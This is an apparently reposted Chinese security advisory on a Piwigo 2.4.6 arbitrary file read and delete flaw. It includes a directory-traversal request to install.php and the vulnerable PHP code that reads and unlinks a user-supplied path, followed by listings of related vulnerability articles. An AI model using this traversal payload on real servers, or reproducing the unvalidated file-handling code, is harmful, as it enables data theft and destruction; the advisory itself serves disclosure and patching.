linux文件删除漏洞,Piwigo任意文件泄露和任意文件删除漏洞

最新推荐文章于 2024-04-27 17:45:06 发布
最新推荐文章于 2024-04-27 17:45:06 发布
阅读量411 收藏
点赞数
文章标签: linux文件删除漏洞

发布日期:2013-02-18

更新日期:2013-02-21

受影响系统:

Piwigo Piwigo

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 58016

Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。

链接:http://packetstormsecurity.com/files/120380/Piwigo-2.4.6-Arbitrary-File-Read-Delete.html

http://osvdb.org/show/osvdb/90357

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/piwigo/install.php?dl=../../../../../../lio_passwords.txt

====================================================================

/install.php:

-------------

113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))

114: {

115:  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];

116:  header('Cache-Control: no-cache, must-revalidate');

117:  header('Pragma: no-cache');

118:  header('Content-Disposition: attachment; filename="database.inc.php"');

119:  header('Content-Transfer-Encoding: binary');

120:  header('Content-Length: '.filesize($filename));

121:  echo file_get_contents($filename);

122:  unlink($filename);

123:  exit();

124: }

====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)

Apache 2.4.2 (Win32)

PHP 5.4.4

MySQL 5.5.25a

建议:

--------------------------------------------------------------------------------

厂商补丁:

Piwigo

------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://piwigo.org/bugs/view.php?id=28430b1331709591d260c1c78e86d0c51c18.png

weixin_39912566
关注
piwigo_gallery:使用MariaDB的Alpine Linux容器中的Piwigo 2.10.2
02-22
piwigo_gallery 在Alpine Linux,Apache 2.4,PHP 7和带有MariaDB的外部容器中使用Piwigo 2.10.2 使用最新版本的Piwigo Gallery构建自己的容器 在本地克隆存储库(git clone ) 获取最新版本的Piwigo Gallery( ) 将ZIP文件内容解压缩到文件夹www 运行容器构建(docker build -t piwigo_fallery。) 运行piwigo_gallery 如果您构建了自己的映像,请用自己的映像名称替换docker-build.yaml文件中的源映像(image:svokac / gallery_web:latest 运行'./setup.sh'进行初始变量设置 运行'docker-compose up -d' 运行'docker-compose start'
piwigo-videojs安装说明和必须安装的软件
03-13
在插件里面的piwigo-videojs设置需要提前设置好,在插件里面的同步是没用的,我测试好几次都不能同步数据和生成缩略图和海报 视频不能直接网页上传,需要用FTP上传到galleries目录 例如你要上传 wenhua.mp4 到...
linux文件删除漏洞,OpenStack Glance v1 API任意文件删除漏洞(CVE-2012-4573)
weixin_39601794的博客
05-07 138
发布日期:2012-11-08更新日期:2012-11-13受影响系统:openstack Glance Grizzlyopenstack Glance Essex (2012.1)openstack Glance Folsom (2012.2)描述:-------------------------------------------------------------------------...
[PHP代码审计]Piwigo11.4.0存在SQL注入漏洞
Y4tacker的博客
06-03 1064
文章目录Piwigo11.4.0存在SQL注入漏洞写在前面分析 Piwigo11.4.0存在SQL注入漏洞 写在前面 国内的不够玩了,玩玩国外的,不过刚找到一个最后告诉我,被交了,好吧为了高大一点教大家一个收集自己装备库的方法 分析 我们查看提交记录,点我直达,发现有一个fix是关于sql注入的 那么我们安装好以后去看一眼,首先是首行的两个参数过滤 觉得很好玩给大家看一眼 限制为数字,好了不多吹牛逼了,看下面正题 首先是接收order参数保证二维数组的[0][column]有值并赋值给变量$col,
php 访问 ws,Piwigo 'ws.php'跨站请求伪造漏洞
weixin_42202078的博客
03-18 397
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html lang="en"><head><title>Piwigo 2.6.1</title></head><body><form action="http://localhost...
任意文件删除的一个总结
aihuochou9723的博客
08-05 466
这两天看了两三个任意文件删除的洞。说实话任意文件删除还算是比较好分析的一个漏洞漏洞的成因主要就是删除的目录路径是我们可控的,且并没有对这个路径进行任何的限制。 php常见的删除命令比如rmdir和unlink这种,如果后面跟的是一个可控的变量就很容易导致这个漏洞。 像我看以前phpcms爆出的一个任意文件删除,这个洞简直随意到让人觉得不是phpcms public funct...
docker-piwigo
05-27
Piwigo-Docker 这是piwigo的图像,与mysql数据库链接。 数据必须存储在一个卷上。 特征 使用docker-compose轻松部署Piwigo。 部署方式 编辑此docker-compose.yml并使用命令$ docker-compose up -d docker-compose....
Piwigo 开源相册系统 v2.9.3
11-07
为了保持系统的安全和功能更新,用户应定期检查Piwigo官方网站,获取最新的版本和安全补丁。升级过程一般包括备份现有数据、下载新版本、覆盖旧文件并运行升级脚本。 ### 总结 Piwigo v2.9.3作为一款开源相册系统...
Piwigo-Android:Piwigo原生Android应用
05-15
Piwigo Android版 软件从未完成,Piwigo-Mobile团队仍在开发此APP,但它已经可用。 如果遇到麻烦,请检查并,以防发现错误。 安装 登录 要显示照片,请在服务器地址字段中输入图库的URL(您在浏览器中也使用的网址...
php任意文件删除漏洞,WordPress任意文件删除漏洞修复方法
weixin_39613839的博客
04-02 305
RIPS团队公开了wordpress 4.9.6以及4.9.6之前版本存在的任意文件删除漏洞,通过该漏洞,具有登录上传附件权限的用户可以删除网站上任意文件,该漏洞在4.9.7版本被修复,如果正在使用wordpress 4.9.7以下版本的用户可以更新到最新版本修复该漏洞,不想更新的站长可以通过下面的方法修复。漏洞原理与危害由于WordPress文件wp-includes/post.php中的函数...
Piwigo 开源相册系统 v2.8.1
12-10
Piwigo是一个基于MySQL5与PHP5开发的相册系统。提供基本的发布和管理照片功能,按多种方式浏览如类别,标签,时间等。 2.5版本在技术及功能方面均有提升,从全新的图标到群组管理,以及三方认证,诸如:OpenID 或 Wordpress.com。 Piwigo 2.5 数据: 30+ 新
Piwigo 开源相册系统 v11.4.0
04-23
Piwigo 开源相册系统简介Piwigo是一个PHP开源图片管理系统,Piwigo带有非常简单的安装界面和管理面板的,Piwigo它具有强大的功能来发布和管理您的图片。扩展使Piwigo轻松定制,锦上添花。Piwigo的特点可设置自由或限制图片访问,角色/用户管理,多服务器支持,支持用户评论,采用HTML模板控制界面外观,多语言支持,一个RSS通知Feed,EXIF和IPTC元数据管理,多目录支持(每一张图片可以同时属于多个目录),所有Web页面都兼容W3C规范。Piwigo 开源相册系统前台页面 Piwigo 开源相册系统后台管理后台路径:域名/admin.php用户名与密码:admin(安装时可设置)后台页面
Piwigo照片库 2.9.3.zip
05-23
Piwigo是由用户和开发人员的活跃社区构建的用于网络的照片库软件,Piwigo有非常简单的安装界面和管理面板,具有强大的功能来发布和管理您的图片。 Piwigo 2.9.3 更新日志:2018-02-24#767通过Shotwell 0.22.0发布,Piwigo 2.9.1失败;#789能够避免登录页面出现错误信息;#777 WS类别getImages,TotalCount;#787 password.php的意外“动作”显示错误;#723在请求私人身份证号码时,会显示永久链接;#747 PHP更改管理页面主题时的通知;#760从picture_modify更改日期创建时不刷新;#678 PHP 7 RSS错误;#751无法运行install/piwigo_structure-mysql.sql两次;#755同步元数据为Mysql 5.7发送日期创建不正确;#731仪表板,缺少照片数量;#739 [搜索]当搜索字词也匹配标签;#732重命名音译功能;#726触发相册创作;#725从HTML保护pwg.images.setInfo;第724页SQL注入页面cat_options;#721通过CSRF和不正确的权限将管理员私人相册设置为public;#713更新通知邮件在法语/英语混合;#710输入参数“redirect_decoded”无效。
exif.js 文件
07-15
获取图片方向js、解决IOS 拍照时图片旋转问题,图片压缩问题、uni-app 上传图片功能,具体用法可参考博客内容
WEB攻防-PHP特性-piwigoCMS审计实例
最新发布
weixin_45534587的博客
04-27 378
注意在rate_picture方法中对rate的值使用了in_array方法来判断传进来的值是否在$conf['rate_items']中,并且没有加上第三个参数true,也就是说传进来的值不做类型判断,并且会强转来完成in_array的判断。找到$conf['rate_items']在config_default.inc.php定义,根据in_array可以知道rate只要前面数字在$conf['rate_items'],后面可以写任何字符,如1,select,都是可以满足条件的。上传一张图片测试一下。
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
使用Piwigo管理您的照片
wbsu2004的博客
10-28 6094
Piwigo 是一款可以用来管理您的图片集与其他媒体的网站程序。
PHP弱类型比较漏洞,PHP弱类型引发的漏洞实例
weixin_32487755的博客
03-11 424
https://www.freebuf.com/articles/web/166543.html****\*本文作者:补丁君,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。******我们知道PHP 是一门弱类型语言,不必向 PHP 声明该变量的数据类型,PHP 会根据变量的值,自动把变量的值转换为正确的数据类型,但在这个转换过程中就有可能引发一些安全问题。**## 类型转换1、会先进行...
任意文件读取及删除漏洞
qq_50854662的博客
09-27 2165
任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件任意文件读取漏洞,是web安全里高危的漏洞,...
docker部署piwigo
12-18
要使用Docker部署Piwigo,首先需要安装Docker引擎。Docker引擎是一种容器化平台,可以轻松地部署和管理应用程序。以下是部署Piwigo的步骤: 第一步是通过Docker Hub下载Piwigo镜像。可以使用以下命令: ``` docker ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值